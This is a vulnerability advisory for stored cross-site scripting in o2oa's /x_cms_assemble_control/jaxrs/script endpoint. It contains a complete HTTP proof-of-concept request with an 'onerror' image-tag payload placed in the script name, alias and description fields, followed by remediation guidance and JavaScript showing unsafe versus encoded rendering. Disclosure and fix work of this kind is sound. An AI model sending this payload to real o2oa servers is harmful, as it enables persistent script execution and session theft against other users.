Description
Stored XSS in /x_cms_assemble_control/jaxrs/script in o2oa ≤ 10.0-410-g3d5e0d2
Summary
In o2oa versions up to 10.0-410-g3d5e0d2, the endpoint /x_cms_assemble_control/jaxrs/script is vulnerable to stored cross-site scripting (XSS). User-supplied values in the script's name, alias and description fields are stored without sanitization and later rendered without output encoding, so a payload saved once executes every time the stored script is displayed to a user.
Exploitation
POC:

The following request creates a CMS script whose name, alias and description each carry an HTML-injection payload. The x-token cookie and Authorization header are the attacker's own session, so an authenticated account with permission to create scripts is required.

```http
POST /x_cms_assemble_control/jaxrs/script?v=develop-10.0-410-3d5e0d2&mehuky1z HTTP/1.1
Host: localhost
sec-ch-ua-platform: "Windows"
Referer: http://localhost/x_desktop/index.html
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Origin: http://localhost
Sec-Fetch-Dest: empty
sec-ch-ua: "Not;A=Brand";v="99", "Google Chrome";v="139", "Chromium";v="139"
Accept-Language: zh-CN
Cookie: x-token=Wrr7kmtfAdF_VIsbJE2G2wzFtw3HHPMzvPAekU6E6zc
Accept: text/html,application/json,*/*
Sec-Fetch-Site: same-origin
Content-Type: application/json; charset=UTF-8
Accept-Encoding: gzip, deflate, br, zstd
Sec-Fetch-Mode: cors
Authorization: Wrr7kmtfAdF_VIsbJE2G2wzFtw3HHPMzvPAekU6E6zc
sec-ch-ua-mobile: ?0
Content-Length: 357

{
  "name": "\"><img src=1 onerror=alert(1)>",
  "id": "a7a910be-849c-430e-ad32-74f2f6682ed7",
  "alias": "\"><img src=1 onerror=alert(1)>",
  "description": "\"><img src=1 onerror=alert(1)>",
  "language": "javascript",
  "dependScriptList": [],
  "isNewScript": true,
  "text": "",
  "validated": true,
  "appId": "c5cbc57e-b5cb-458b-99fd-9d7e06f6f842"
}
```

When the stored script is later viewed in the application, the payload is rendered as markup and the onerror handler fires, confirming stored XSS. The leading `">` in each value closes an attribute and its tag first, so the payload works whether the field lands in an HTML attribute or in element text.
Impact
- Persistent JavaScript execution in victim browsers
- Possible theft of session tokens or sensitive user data
- Unauthorized actions performed on behalf of authenticated users
Remediation
Validate the script name, alias and description on the server before storage (reject or strip markup in fields that are plain identifiers), and apply context-appropriate output encoding whenever stored values are rendered: HTML-entity encode them in element text and in attribute values, or write them to the DOM with textContent and setAttribute rather than by concatenating them into HTML strings. Output encoding is the control that actually prevents execution; input filtering alone can be bypassed by encodings the filter does not anticipate.
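The contrast below is an added example, not o2oa's own front-end code: it renders the script record from the POC above first by string concatenation (the pattern that makes the stored values executable) and then with HTML-entity encoding of every stored field. The surrounding template markup, the function names and the containsInjectedTag check are assumptions made for illustration; the field names and payload are taken from the POC.

```javascript
// Added example (not o2oa code). Demonstrates why output encoding at render
// time neutralises the stored payload from the POC, independent of any
// input filtering.

// Constructed sample: the script record as stored after the POC request.
const storedScript = {
  name: '"><img src=1 onerror=alert(1)>',
  alias: '"><img src=1 onerror=alert(1)>',
  description: '"><img src=1 onerror=alert(1)>',
  language: 'javascript',
};

// Vulnerable pattern (hypothetical template): stored values are concatenated
// straight into HTML, once in an attribute and twice in element text.
function renderUnsafe(script) {
  return `<div class="script" title="${script.alias}">` +
         `<h3>${script.name}</h3>` +
         `<p>${script.description}</p></div>`;
}

// Encode the characters that can change meaning in HTML text and in a
// double-quoted attribute value. Encoding '&' first-class (not in a second
// pass) avoids double-encoding already-encoded data.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened pattern: same template, every stored value encoded for its context.
// In browser code the equivalent is el.textContent = value and
// el.setAttribute('title', value) instead of building HTML strings.
function renderSafe(script) {
  return `<div class="script" title="${escapeHtml(script.alias)}">` +
         `<h3>${escapeHtml(script.name)}</h3>` +
         `<p>${escapeHtml(script.description)}</p></div>`;
}

// Crude detector for the demonstration: does the rendered markup contain an
// <img> tag that the template itself never emits?
function containsInjectedTag(html) {
  return /<img\b/i.test(html);
}

console.log('unsafe render injects a tag:', containsInjectedTag(renderUnsafe(storedScript)));
console.log('safe render injects a tag:  ', containsInjectedTag(renderSafe(storedScript)));
```

Note that the safe renderer does not try to recognise the payload; it encodes every value unconditionally, so variants such as `<svg onload=...>` or an encoded `<` are handled the same way. Server-side validation of the name and alias fields is still worthwhile as defence in depth, but the page that displays the data is where the bug is fixed.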